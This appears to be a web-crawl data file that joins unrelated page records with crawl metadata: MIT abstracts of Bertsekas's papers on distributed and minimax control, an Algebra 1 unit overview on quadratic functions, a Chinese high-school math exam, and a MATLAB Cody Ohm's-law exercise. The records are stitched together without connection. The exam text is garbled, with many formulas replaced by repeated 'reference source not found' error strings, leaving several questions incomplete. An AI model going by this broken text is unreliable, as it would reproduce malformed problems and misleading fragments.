803-812.\n\nAbstract: We present a model for asynchronous distributed computation and then proceed to analyze the convergence of natural asynchronous distributed versions of a large class of deterministic and stochastic gradient-like algorithms. We show that such algorithms retain the desirable convergence properties of their centralized counterparts, provided that the time between consecutive interprocessor communications and the communication delays are not too large.\n\n• D. P. Bertsekas, \"Distributed Asynchronous Computation of Fixed Points,\" Mathematical Programming, Vol. 27, 1983, pp. 107-120.\n\nAbstract: We present an algorithmic model for distributed computation computation of fixed points whereby several processors participate simultaneously in the calculations while exchanging information via communication links. We place essentially no restrictions on the ordering of computation and communication between processors thereby allowing for completely uncoordinated execution. We provide a general convergence theorem for algorithms of this type, and demonstrate its applicability to several classes of problems, including the calculation of fixed points of contraction and monotone mappings arising in linear and nonlinear systems of equations, optimization problems, shortest path problems, and dynamic programming.\n\n• D. P. Bertsekas, \"Distributed Dynamic Programming,\" IEEE Transactions on Aut. Control, Vol AC-27, 1982, pp. 610-616.\n\nAbstract: We consider distributed algorithms for solving dynamic programming problems whereby several processors participate simultaneously in the computation while maintaining coordination by information exchange via communication links. A model of asynchronous distributed computation is developed which requires very weak assumptions on the ordering of computations,the timing of information exchange,the amount of local information needed at each computation node, and the initial condition for the algorithm. the class of problems considered is very broad and includes shortest path problems, and finite and infinite horizon stochastic optimal control problems. When specialized to the shortest path problem, the algorithm reduces t the algorithm originally implemented for routing messages in the internet.\n\n• Kimemia, J., Gershwin, S., and D. P. Bertsekas, \"Computation of Production Control Policies by a Dynamic Programming Technique,\" LIDS Report LIDS-P-1236, MIT; also in Analysis and Optimization of Systems, A. Bensoussan and J. L. Lions (eds.), Springer, N. Y., pp. 243-269, 1982.\n\nAbstract: The problem of production management for an automated manufacturing system is described. The system consists of machines that can perform a variety of tasks on a family of parts. The machines are unreliable, and the main difficulty the control system faces is to meet production requirements while machines fail and are repaired at random times. A multi-level hierarchical control algorithm is proposed which involves a stochastic optimal control problem at the first level. Optimal production policies are characterized and a computational scheme is described.\n\n• E. Gafni, and D. P. Bertsekas, \"Distributed Algorithms for Generating Loop-Free Routes in Networks with Frequently Changing Topology,\" IEEE Trans. on Communications, Vol. COM-29, 1981, pp. 11-18.\n\nAbstract: We consider the problem of maintaining communication between the nodes of a data network and a central station in the presence of frequent topological changes as, for example, in mobile packet radio networks. We argue that flooding schemes have significant drawbacks for such networks, and propose a general class of distributed algorithms for establishing new loop-free routes to the station for any node left without a route due to changes in the network topology. By virtue of built-in redundancy, the algorithms are typically activated very infrequently and, even when they are, they do not involve any communication within the portion of the network that has not been materially affected by a topological change.\n\n• D. P. Bertsekas, \"A Distributed Algorithm for the Assignment Problem,\" Lab. for Information and Decision Systems Report, MIT, May 1979; a typeset version of the typewritten original.\n\nAbstract: This paper describes a new algorithm for solving the classical assignment problem. The algorithm is of a primal-dual nature and in some ways resembles the Hungarian and subgradient methods, but is substantially different in other respects. Its main feature is that it is well suited for distributed operation whereby each node participates in the computation on the basis of limited local information about the topology of the network and the data of the problem. The algorithmic process resembles an auction where economic agents compete for resources by making successively higher bids. The algorithm terminates in a finite number of iterations after resource prices reach levels where no further bidding is profitable.\n\n• D. P. Bertsekas, \"Control of Uncertain Systems with a Set-Membership Description of the Uncertainty,\" Ph.D. Thesis, Dept. of Electrical Engineering, M.I.T., 1971.\n\nAbstract: The problem of optimal feedback control of uncertain discrete-time dynamic systems is considered, where the uncertain quantities do not have a stochastic description but instead they are known to belong to given sets. The problem is converted to a sequential minimax problem and dynamic programming is suggested as a general method for its solution. The notion of a sufficiently informative function, which parallels the notion of a sufficient statistic of optimal control is introduced, and the possible decomposition of the optimal controller into an estimator and an actuator is demonstrated. Some special cases involving a linear system are further examined. A problem involving a convex cost functional and perfect state information for the controller is considered in detail. Particular attention is given to a special case, the problem of reachability of a target tube, and an ellipsoidal approximation algorithm is obtained which leads to linear control laws. State estimation problems are also examined, and some algorithms are derived which offer distinct advantages over existing estimation schemes. These algorithms are subsequently used in the solution of some reachability problems with imperfect state information for the controller.\n\n• D. P. Bertsekas and I. B. Rhodes, \"On the Minimax Reachability of Target Sets and Target Tubes,\" Automatica, Vol. 7, pp. 233-241, March 1971.\n\nAbstract: This paper is concerned with the closed-loop control of discrete-time systems in the presence of uncertainty. The uncertainty may arise as disturbances in the system dynamics, disturbances corrupting the output measurements or incomplete knowledge of the initial state of the system. In all cases, the uncertain quantities are assumed unknown except that they lie in given sets. Attention is first given to the problem of driving the system state at the final time into a prescribed target set under the worst possible combination of disturbances. This is then extended to the problem of keeping the entire state trajectory in a given target \"tube.\" Necessary and sufficient conditions for reachability of a target set and a target tube are given in the case where the system state can be measured exactly, while sufficient conditions for reachability are given for the case where only disturbance corrupted output measurements are available. An algorithm is given for the efficient construction of ellipsoidal approximations to the sets involved and it is shown that this algorithm leads to linear control laws. The application of the results in this paper to pursuit-evasion games is also discussed.\n\n• D. P. Bertsekas and I. B. Rhodes, \"Recursive State Estimation with a Set-Membership Description of the Uncertainty,\" IEEE Trans. on Automatic Control, Vol. AC-16, pp. 117-128, April 1971.\n\nAbstract: This paper is concerned with the problem of estimating the state of a linear dynamic system using noise-corrupted observations, when input disturbances and observation errors are unknown except for the fact that they belong to given bounded sets. The cases of both energy constraints and individual instantaneous constraints for the uncertain quantities are considered. In the former case, the set of possible system states compatible with the observations received is shown to be an ellipsoid, and equations for its center and weighting matrix are given, while in the latter case, equations describing a bounding ellipsoid to the set of possible states are derived. All three problems of filtering, prediction, and smoothing are examined by relating them to standard tracking problems of optimal control theory. The resulting estimators are similar in structure and comparable in simplicity to the corresponding stochastic linear minimum-variance estimators, and it is shown that they provide distinct advantages over existing schemes for recursive estimation with a set-membership description of uncertainty.\n\n• D. P. Bertsekas, \"Infinite Time Reachability of State Space Regions by Using Feedback Control,\" IEEE Trans. on Automatic Control, Vol. AC-17, pp. 604-613, October 1972.\n\nAbstract: In this paper we consider some aspects of the problem of feedback control of a time-invariant uncertain system subject to state constraints over an infinite-time interval. The central question that we investigate is under what conditions can the state of the uncertain system be forced to stay in a specified region of the state space for all times by using feedback control. At the same time we study the behavior of the region of n-step reachability as n tends to infinity. It is shown that in general this region may exhibit instability as we pass to the limit, and that under a compactness assumption this region converges to a steady state. A special case involving a linear finite-dimensional system is examined in more detail. It is shown that there exist ellipsoidal regions in state space where the state can be confined by making use of a linear time-invariant control law, provided that the system is stabilizable. Such control laws can be calculated efficiently through the solution of a recursive matrix equation of the Riccati type.\n\n• D. P. Bertsekas, \"On the Solution of Some Minimax Problems,\" Proceedings of the 1972 IEEE Conference on Decision and Control, pp. 328-332.\n\nAbstract: In dynamic minimax and stochastic optimization problems frequently one is forced to use a suboptimal controller since the computation and implementation of the optimal controller based on dynamic programming is impractical in many cases. In this paper we study the performance of some suboptimal controllers in relation to the performance of the optimal feedback controller and the optimal open-loop controller. Attention is focused on some classes of, so called, open-loop-feedback controllers. It is shown under quite general assumptions that these open-loop-feedback controllers perform at least as well as the optimal open-loop controller. The results are developed for general minimax problems with perfect and imperfect state information. In the latter case the open-loop-feedback controller makes use of an estimator which is required to perform at least as well as a pure predictor in order for the results to hold. Some of the results presented have stochastic counterparts.\n\n• D. P. Bertsekas and I. B. Rhodes, \"Sufficiently Informative Functions and the Minimax Feedback Control of Uncertain Dynamic Systems,\" IEEE Trans. on Automatic Control, Vol. AC-18, pp. 117-124, April 1973.\n\nAbstract: The problem of optimal feedback control of uncertain discrete-time dynamic systems is considered where the uncertain quantities do not have a stochastic description but instead are known to belong to given sets. The problem is converted to a sequential minimax problem and dynamic programming is suggested as a general method for its solution. The notion of a sufficiently informative function, which parallels the notion of a sufficient statistic of stochastic optimal control, is introduced, and conditions under which the optimal controller decomposes into an estimator and an actuator are identified. A limited class of problems for which this decomposition simplifies the computation and implementation of the optimal controller is delineated.\n\n• D. P. Bertsekas, \"Linear Convex Stochastic Control Problems Over an Infinite Horizon,\" IEEE Transactions on Aut. Control, Vol. AC-18, 1973, pp. 314-315.\n\nAbstract: A stochastic control problem over an infinite horizon which involves a linear system and a convex cost functional is analyzed. We prove the convergence of the dynamic programming algorithm associated with the problem, and we show the existence of a stationary Borel measurable optimal control law. The approach used illustrates how results on infinite time reachability can be used for the analysis of dynamic programming algorithms over an infinite horizon subject to state constraints.\n\n• D. P. Bertsekas, \"Separable Dynamic Programming and Approximate Decomposition Methods,\" Lab. for Information and Decision Systems Report 2684, MIT, Feb. 2006; IEEE Trans. on Aut. Control, Vol. 52, 2007, pp. 911-916.\n\nAbstract: We consider control, planning, and resource allocation problems involving several independent subsystems that are coupled through a control/decision constraint. We discuss one-step lookahead methods that use an approximate cost-to-go function derived from the solution of single subsystem problems. We propose a new method for constructing such approximations, and derive bounds on the performance of the associated suboptimal policies. We then specialize this method to problems of reachability of target tubes that have the form of a box (a Cartesian product of subsystem tubes). This yields inner approximating tubes, which have the form of a union of a finite number of boxes, each involving single subsystem calculations.\n\n• D. P. Bertsekas, \"Robust Shortest Path Planning and Semicontractive Dynamic Programming,\" Lab. for Information and Decision Systems Report LIDS-P-2915, MIT, Feb. 2014 (revised Jan. 2015 and June 2016); Naval Research Logistics (NRL), Vol. 66, 2019 pp.15-37. In this paper we consider shortest path problems in a directed graph where the transitions between nodes are subject to uncertainty. We use a minimax formulation, where the objective is to guarantee that a special destination state is reached with a minimum cost path even under the worst possible instance of the uncertainty. Problems of this type arise, among others, in planning and pursuit-evasion contexts, and in model predictive control. Our analysis makes use of the recently developed theory of abstract semicontractive dynamic programming models. We investigate questions of existence and uniqueness of solution of the optimality equation, existence of optimal paths, and the validity of various algorithms patterned after the classical methods of value and policy iteration, as well as a new Dijkstra-like algorithm for problems with nonnegative arc lengths." ]
[ null, "file://counter.mit.edu/tally", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8873267,"math_prob":0.88472795,"size":252037,"snap":"2023-14-2023-23","text_gpt3_token_len":53651,"char_repetition_ratio":0.19207008,"word_repetition_ratio":0.32728714,"special_character_ratio":0.20114507,"punctuation_ratio":0.15056074,"nsfw_num_words":2,"has_unicode_error":false,"math_prob_llama3":0.9792882,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-05-28T07:16:24Z\",\"WARC-Record-ID\":\"<urn:uuid:ffb38f3f-5241-4e02-b098-3d3da33da3b2>\",\"Content-Length\":\"301096\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:fe137f85-b6f7-451c-8911-c739a83ade2c>\",\"WARC-Concurrent-To\":\"<urn:uuid:5539f6a3-db5b-40e6-ab97-fd0bc5a04488>\",\"WARC-IP-Address\":\"23.6.64.128\",\"WARC-Target-URI\":\"http://web.mit.edu/dimitrib/www/publ.html\",\"WARC-Payload-Digest\":\"sha1:W54IUHOHK7GJGBYFQZPBM3G67CRC2FV2\",\"WARC-Block-Digest\":\"sha1:LNLPMVT4MOUPMBJOJYQYFAZEDWZPEL4S\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224643585.23_warc_CC-MAIN-20230528051321-20230528081321-00149.warc.gz\"}"}
https://www.fishtanklearning.org/curriculum/math/algebra-1/quadratic-functions-and-solutions/
[ "Students investigate and understand the features that are unique to quadratic functions, and they learn to factor quadratic equations in order to reveal the roots of the equation.\n\nMath\n\nUnit 7\n\n## Unit Summary\n\nIn Unit 7, Introduction to Quadratic Functions and Solutions, students take a closer look at quadratic functions. Because there is so much to cover on quadratic functions and equations, these concepts have been split over two units: Unit 7 and the last unit of the year, Unit 8. In Unit 7, students investigate and understand the features that are unique to quadratic functions, and they write quadratic equations into the equivalent intercept form in order to reveal the solutions of the equation. In Unit 8, students will learn about the vertex form and how to complete the square, along with digging into several real-world problems that involve quadratics.\n\nIn Topic A, students analyze features of quadratic functions as they are seen in graphs, equations, and tables. They draw on their understandings of linear and exponential functions to compare how quadratic functions may be similar or different.\n\nIn Topic B, students learn how to factor a quadratic equation in order to reveal the roots or solutions to the equation. They rewrite quadratic trinomials as the product of two linear binomials, and then using the zero product property, they determine the solutions when the function is equal to zero. Students also identify and compare solutions to quadratic functions that are represented as equations, tables, and graphs. Lastly, by determining the coordinates of the vertex of the parabola, students are able to sketch a reliable graph of the parabola using the $${x-}$$intercepts and the vertex as three defining points.\n\nIn Topic C, students bring together the concepts and skills from the unit in order to interpret solutions to quadratic equations in context. They look at examples involving projectile motion, profit and cost analysis, and geometric applications. Students will spend more time with these applications in Unit 8.\n\nPacing: 15 instructional days (13 lessons, 1 flex day, 1 assessment day)\n\n## Assessment\n\nThe following assessments accompany Unit 7.\n\n### Post-Unit\n\nUse the resources below to assess student mastery of the unit content and action plan for future units.\n\n## Unit Prep\n\n### Intellectual Prep\n\nInternalization of Standards via the Unit Assessment\n\n• Take unit assessment. Annotate for:\n• Standards that each question aligns to\n• Purpose of each question: spiral, foundational, mastery, developing\n• Strategies and representations used in daily lessons\n• Relationship to Essential Understandings of unit\n• Lesson(s) that assessment points to\n\nInternalization of Trajectory of Unit\n\n• Read and annotate “Unit Summary.”\n• Notice the progression of concepts through the unit using “Unit at a Glance.”\n• Essential understandings\n• Connection to assessment questions\n\n### Essential Understandings\n\n• Quadratic functions are represented as parabolas in the coordinate plane with a vertical line of symmetry that passes through the vertex. The roots or solutions of a quadratic function are the $$x$$-intercepts of the graph where $$f(x)=0$$, and can be determined algebraically using the equation and the Zero Product Property.\n• Quadratic trinomials can sometimes be factored into the product of two linear binomials. Special factoring cases include a difference of two squares and perfect square trinomials. This factored form of a quadratic function, intercept form, is useful in revealing the zeros or solutions to a quadratic equation.\n\n### Vocabulary\n\n Quadratic functions Greatest common factor Second difference Zero Product Property Maximum/minimum Intercept form Line of symmetry Linear binomial Roots/solutions/$$x$$-intercepts Quadratic trinomial Parabola Difference of two squares Vertex Perfect square trinomial\n\n### Materials\n\n• Graphing technology\n\n## Lesson Map\n\nTopic A: Features of Quadratic Functions\n\nTopic B: Factoring and Solutions of Quadratic Equations\n\nTopic C: Interpreting Solutions of Quadratic Functions in Context\n\n## Common Core Standards\n\nKey\n\nMajor Cluster\n\nSupporting Cluster\n\n### Core Standards\n\n#### Arithmetic with Polynomials and Rational Expressions\n\n• A.APR.A.1 — Understand that polynomials form a system analogous to the integers, namely, they are closed under the operations of addition, subtraction, and multiplication; add, subtract, and multiply polynomials.\n• A.APR.B.3 — Identify zeros of polynomials when suitable factorizations are available, and use the zeros to construct a rough graph of the function defined by the polynomial.\n\n#### Creating Equations\n\n• A.CED.A.1 — Create equations and inequalities in one variable and use them to solve problems. Include equations arising from linear and quadratic functions, and simple rational and exponential functions.\n\n#### Interpreting Functions\n\n• F.IF.B.4 — For a function that models a relationship between two quantities, interpret key features of graphs and tables in terms of the quantities, and sketch graphs showing key features given a verbal description of the relationship. Key features include: intercepts; intervals where the function is increasing, decreasing, positive, or negative; relative maximums and minimums; symmetries; end behavior; and periodicity. Modeling is best interpreted not as a collection of isolated topics but in relation to other standards. Making mathematical models is a Standard for Mathematical Practice, and specific modeling standards appear throughout the high school standards indicated by a star symbol (★). The star symbol sometimes appears on the heading for a group of standards; in that case, it should be understood to apply to all standards in that group.\n• F.IF.B.5 — Relate the domain of a function to its graph and, where applicable, to the quantitative relationship it describes. For example, if the function h(n) gives the number of person-hours it takes to assemble n engines in a factory, then the positive integers would be an appropriate domain for the function. Modeling is best interpreted not as a collection of isolated topics but in relation to other standards. Making mathematical models is a Standard for Mathematical Practice, and specific modeling standards appear throughout the high school standards indicated by a star symbol (★). The star symbol sometimes appears on the heading for a group of standards; in that case, it should be understood to apply to all standards in that group.\n• F.IF.B.6 — Calculate and interpret the average rate of change of a function (presented symbolically or as a table) over a specified interval. Estimate the rate of change from a graph. Modeling is best interpreted not as a collection of isolated topics but in relation to other standards. Making mathematical models is a Standard for Mathematical Practice, and specific modeling standards appear throughout the high school standards indicated by a star symbol (★). The star symbol sometimes appears on the heading for a group of standards; in that case, it should be understood to apply to all standards in that group.\n• F.IF.C.7 — Graph functions expressed symbolically and show key features of the graph, by hand in simple cases and using technology for more complicated cases. Modeling is best interpreted not as a collection of isolated topics but in relation to other standards. Making mathematical models is a Standard for Mathematical Practice, and specific modeling standards appear throughout the high school standards indicated by a star symbol (★). The star symbol sometimes appears on the heading for a group of standards; in that case, it should be understood to apply to all standards in that group.\n• F.IF.C.7.A — Graph linear and quadratic functions and show intercepts, maxima, and minima.\n• F.IF.C.8 — Write a function defined by an expression in different but equivalent forms to reveal and explain different properties of the function.\n• F.IF.C.8.A — Use the process of factoring and completing the square in a quadratic function to show zeros, extreme values, and symmetry of the graph, and interpret these in terms of a context.\n• F.IF.C.9 — Compare properties of two functions each represented in a different way (algebraically, graphically, numerically in tables, or by verbal descriptions). For example, given a graph of one quadratic function and an algebraic expression for another, say which has the larger maximum.\n\n#### Linear, Quadratic, and Exponential Models\n\n• F.LE.A.2 — Construct linear and exponential functions, including arithmetic and geometric sequences, given a graph, a description of a relationship, or two input-output pairs (include reading these from a table).\n• F.LE.A.3 — Observe using graphs and tables that a quantity increasing exponentially eventually exceeds a quantity increasing linearly, quadratically, or (more generally) as a polynomial function.\n\n#### Reasoning with Equations and Inequalities\n\n• A.REI.B.4 — Solve quadratic equations in one variable.\n• A.REI.B.4.B — Solve quadratic equations by inspection (e.g., for x² = 49), taking square roots, completing the square, the quadratic formula and factoring, as appropriate to the initial form of the equation. Recognize when the quadratic formula gives complex solutions and write them as a ± bi for real numbers a and b.\n\n#### Seeing Structure in Expressions\n\n• A.SSE.A.1 — Interpret expressions that represent a quantity in terms of its context Modeling is best interpreted not as a collection of isolated topics but in relation to other standards. Making mathematical models is a Standard for Mathematical Practice, and specific modeling standards appear throughout the high school standards indicated by a star symbol (★). The star symbol sometimes appears on the heading for a group of standards; in that case, it should be understood to apply to all standards in that group.\n• A.SSE.A.1.A — Interpret parts of an expression, such as terms, factors, and coefficients.\n• A.SSE.A.2 — Use the structure of an expression to identify ways to rewrite it. For example, see x4 — y4 as (x²)² — (y²)², thus recognizing it as a difference of squares that can be factored as (x² — y²)(x² + y²).\n• A.SSE.B.3 — Choose and produce an equivalent form of an expression to reveal and explain properties of the quantity represented by the expression. Modeling is best interpreted not as a collection of isolated topics but in relation to other standards. Making mathematical models is a Standard for Mathematical Practice, and specific modeling standards appear throughout the high school standards indicated by a star symbol (★). The star symbol sometimes appears on the heading for a group of standards; in that case, it should be understood to apply to all standards in that group.\n• A.SSE.B.3.A — Factor a quadratic expression to reveal the zeros of the function it defines.\n\n• 8.EE.A.1\n• 8.EE.A.2\n\n• F.IF.A.2\n\n• F.LE.A.1\n\n• A.APR.C.4\n• A.APR.C.5\n\n• F.BF.B.3\n\n• A.CED.A.2\n\n• A.REI.B.4\n• A.REI.B.4.A\n• A.REI.B.4.B\n• A.REI.C.7\n\n• A.SSE.B.3\n• A.SSE.B.3.B\n\n### Standards for Mathematical Practice\n\n• CCSS.MATH.PRACTICE.MP1 — Make sense of problems and persevere in solving them.\n\n• CCSS.MATH.PRACTICE.MP2 — Reason abstractly and quantitatively.\n\n• CCSS.MATH.PRACTICE.MP3 — Construct viable arguments and critique the reasoning of others.\n\n• CCSS.MATH.PRACTICE.MP4 — Model with mathematics.\n\n• CCSS.MATH.PRACTICE.MP5 — Use appropriate tools strategically.\n\n• CCSS.MATH.PRACTICE.MP6 — Attend to precision.\n\n• CCSS.MATH.PRACTICE.MP7 — Look for and make use of structure.\n\n• CCSS.MATH.PRACTICE.MP8 — Look for and express regularity in repeated reasoning.\n\nUnit 6\n\nExponents and Exponential Functions\n\nUnit 8" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90777236,"math_prob":0.9686222,"size":880,"snap":"2022-40-2023-06","text_gpt3_token_len":168,"char_repetition_ratio":0.11986301,"word_repetition_ratio":0.0,"special_character_ratio":0.17954545,"punctuation_ratio":0.14193548,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99656874,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-29T05:10:53Z\",\"WARC-Record-ID\":\"<urn:uuid:e64d146e-c48d-4c9b-8179-cef3ae5762a5>\",\"Content-Length\":\"412539\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e9a85dbc-884b-49be-a2e8-e34383258b62>\",\"WARC-Concurrent-To\":\"<urn:uuid:c24013ac-0251-4fa8-8a99-154ead97c87d>\",\"WARC-IP-Address\":\"172.67.68.95\",\"WARC-Target-URI\":\"https://www.fishtanklearning.org/curriculum/math/algebra-1/quadratic-functions-and-solutions/\",\"WARC-Payload-Digest\":\"sha1:Q74VD56RXIY34AYGQWBWL4MPUH4J45WH\",\"WARC-Block-Digest\":\"sha1:GYQEH6NAM3VT52PEYBAFW62YVQWBSWZZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499700.67_warc_CC-MAIN-20230129044527-20230129074527-00314.warc.gz\"}"}
https://m.racktom.com/read/31df336cf2424b732728647d6529f68ab74d83bc.html
[ "# 福建省四地六校2017-2018学年高三上学期第一次联考(10月)数学(文)试题试卷 Word版含答案\n\n“华安、连城、永安、漳平一中,龙海二中,泉港一中”六校联考 2017-2018 学年上学期第一次月考 高三数学(文科)试题 (考试时间:120分钟 第Ⅰ卷 (选择题 总分:150分) 共 60 分) 一、选择题(本大题共 12 小题,每小题 5 分,共 60 分,在每小题给出的四个选项中,只有 一项是符合题目要求的) 1.错误!未找到引用源。=( A.2 错误!未找到引用源。 ) B.2 C. 1 D. 错误!未找到引用源。 2.设 a ? sin 145°, b ? cos 52°, c ? tan 47°,则 a , b, c 的大小关系是 A. a ? b ? c B. c ? b ? a C. b ? a ? c D. a ? c ? b ) D. ? 2,3? 3. 函数 f ( x) ? e x ? x ? 2 的零点所在的区间是( e ? 2.71828 )( A. ? 0, ? 4、下列中的假是( A. ?x ? R, 2x?1 ? 0 C. ?x ? R, ln x ? 1 ? ? 1? 2? B. ? ,1? ) ?1 ? ?2 ? C. ?1, 2 ? * B. ?x ? N , ? x ? 1? 2 ?0 D. ?x ? R, tan x ? 2 5.已知集合 A=错误!未找到引用源。 ,B={x|错误!未找到引用源。≤2,x∈Z},则满足条件 A ? C ? B 的集合 C 的个数为( A.1 B.2 ) C.4 D.8 6.设等比数列 {an } 的公比 q ? 2 ,前 n 项和为 Sn ,则 S4 ?( a2 ) 15 17 D. 2 2 7.已知平面向量 a =(1,-3) , b =(4,-2) , ? a ? b 与 a 垂直,则 ? 是( A. 2 B. 4 C. A. -1 B. 1 C. -2 D. 2 ) 8.已知 cos 错误!未找到引用源。-sinα =错误!未找到引用源。,则 sin 错误!未找到引用 源。的值是( ) B.-错误!未找到引用源。 D.错误!未找到引用源。 C. 错 误 ! A.-错误!未找到引用源。 未找到引用源。 9.设数列 {an } 是以 3 为首项,1 为公差的等差数列,{bn }是以 1 为首项,2 为公比的等比数列, 则 ba1 ? ba2 ? ba3 ? ba4 = A.15 B.72 C.63 D. 60 x 2 ? 2 x ? a, x ? 10、设函数 f ( x) ? 1 2 1 4 ? 3, x ? 2 x 的最小值为-1,则实数 a 的取值范围是 A. a ? ?2 B. a ? ?2 C. a ? ? 1 4 D. a ? ? 1 4 11.已知 ?ABC 中,内角 A , B , C 所对的边长分别为 a , b , c 。若 a ? 2bcosA ,B ? 则 ?ABC 的面积等于 A. ? ,c ? 1 , 3 3 8 B. 3 6 C. 3 4 D. 3 2 12.对于函数 f ( x ) ,若存在区间 A ? [m,n] ,使得 ?y | y ? f ( x),x ? A? ? A ,则称函数 f ( x) 为“可等域函数”,区间 A 为函数 f ( x) 的一个“可等域区间”.给出下列 4 个函数: ? x ① f ( x) ? sin( x) , ② f ( x) ? 2 x 2- ③ f ( x) ? 1 ? 2 , ④ f ( x) ? log 2 (2 x ? 2) . 1, 2 其中存在唯一“可等域区间”的“可等域函数”为 A.①②③ B.②③ C. ①③ 二.填空题: (本大题共 4 小题,每小题 5 分,满分 20 分) 13.已知向量 a,b,满足|a|=1,| b |= 3,a+b=( 3,1),则向量 a 与 b 的夹角是 14. 若等比数列{an}的各项均为正数,且 a10a11+a9a12=2e ,则 lna1+lna2+…+lna20= 15.在△ABC 中,若 tanB=-2,cosC=错误!未找到引用源。,则角 A= 2 5 D. ②③④ 。 . . 16 .已知函数 f(x)=x + 错误!未找到引用源。 ,g(x)= 错误!未找到引用源。 -m. 若 ? x1 ∈ [1,2], ? x2∈[-1,1]使 f(x1)≥g(x2),则实数 m 的取值范围是 . 三、解答题(本大题共 6 小题,共 70 分,解答应写出文字说明,证明过程或演算步骤) 17. (本小题满分 10 分)设 {a n } 是等差数列, {b n } 是各项都为正数的等比数列,且 a1 ? b1 ? 1 , a3 ? b3 ? 9 , a5 ? b5 ? 25 . (Ⅰ)求 {a n } , {b n } 的通项公式; (Ⅱ)求数列 {a n } , {b n } 的前 n 项和 Sn 和 Tn 18. (本小题满分 12 分)已知函数 f ( x) ? 2 cos x sin( x ? (1)求函数 f ( x) 的最小正周期; (2)求函数 f ( x) 的最大值及最小值; (3)写出 f ( x) 的单调递增区间。 ? 3 ) ? 3 sin 2 x ? sin x cos x 。 19. (本小题满分 12 分)已知函数 f(x)=log3 错误!未找到引用源。. (1)求函数 f(x)的定义域. (2)判断函数 f(x)的奇偶性. (3)当 x∈错误!未找到引用源。时,函数 g(x)=f(x),求函数 g(x)的值域. 20.(本小题满分 12 分)设数列{an}的前 n 项和为 Sn=n ,{bn}为等比数列,且 a1=b1,b2(a2-a1)=b1. (1)求数列{an},{bn}的通项公式. (2)设 cn=an・bn,求数列{cn}的前 n 项和 Tn. 2 21\n\n## 相关文档\n\n2017-2018学年福建省南平市高三上学期第一次综合质量检查(10月) 数学(文) Word版含答案" ]
[ null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.96792537,"math_prob":0.9965916,"size":2493,"snap":"2019-35-2019-39","text_gpt3_token_len":1937,"char_repetition_ratio":0.13298513,"word_repetition_ratio":0.01983471,"special_character_ratio":0.566787,"punctuation_ratio":0.23294118,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96486986,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-19T09:50:25Z\",\"WARC-Record-ID\":\"<urn:uuid:c99b1054-81f1-4d8f-9437-7d5799fc5374>\",\"Content-Length\":\"9683\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7bdb672f-f08d-4972-8349-180c8d53c75e>\",\"WARC-Concurrent-To\":\"<urn:uuid:ad769d81-a1b8-44df-8d80-01c9db9b446a>\",\"WARC-IP-Address\":\"180.97.220.194\",\"WARC-Target-URI\":\"https://m.racktom.com/read/31df336cf2424b732728647d6529f68ab74d83bc.html\",\"WARC-Payload-Digest\":\"sha1:HHDWMZYBGNW6APRKNDVS3VM52MAJRNUI\",\"WARC-Block-Digest\":\"sha1:4XWDYYVL56YUENQFQ6W4SQEEBOM33C7R\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514573465.18_warc_CC-MAIN-20190919081032-20190919103032-00283.warc.gz\"}"}
https://es.mathworks.com/matlabcentral/cody/problems/45209-an-ohm-s-law-calculator/solutions/2077487
[ "Cody\n\n# Problem 45209. An Ohm's Law Calculator\n\nSolution 2077487\n\nSubmitted on 3 Jan 2020 by Rathin Joshi\nThis solution is locked. To view this solution, you need to provide a solution of the same size or smaller.\n\n### Test Suite\n\nTest Status Code Input and Output\n1   Pass\nI = 0.09; %90mA current R = 100; %100 Ohm resistor V_correct = 9; %9V voltage assert(isequal(OhmsLaw(I,R),V_correct))\n\n2   Pass\nI = 0.012; %12mA current R = 1000; %1kOhm resistor V_correct = 12; %12V voltage assert(isequal(OhmsLaw(I,R),V_correct))\n\n### Community Treasure Hunt\n\nFind the treasures in MATLAB Central and discover how the community can help you!\n\nStart Hunting!" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.63977116,"math_prob":0.9587752,"size":600,"snap":"2020-45-2020-50","text_gpt3_token_len":188,"char_repetition_ratio":0.12248322,"word_repetition_ratio":0.0,"special_character_ratio":0.33166668,"punctuation_ratio":0.1440678,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98278046,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-24T04:55:02Z\",\"WARC-Record-ID\":\"<urn:uuid:11c916f6-2d3a-47d3-8201-a28296c37e79>\",\"Content-Length\":\"78494\",\"Content-Type\":\"application/http; 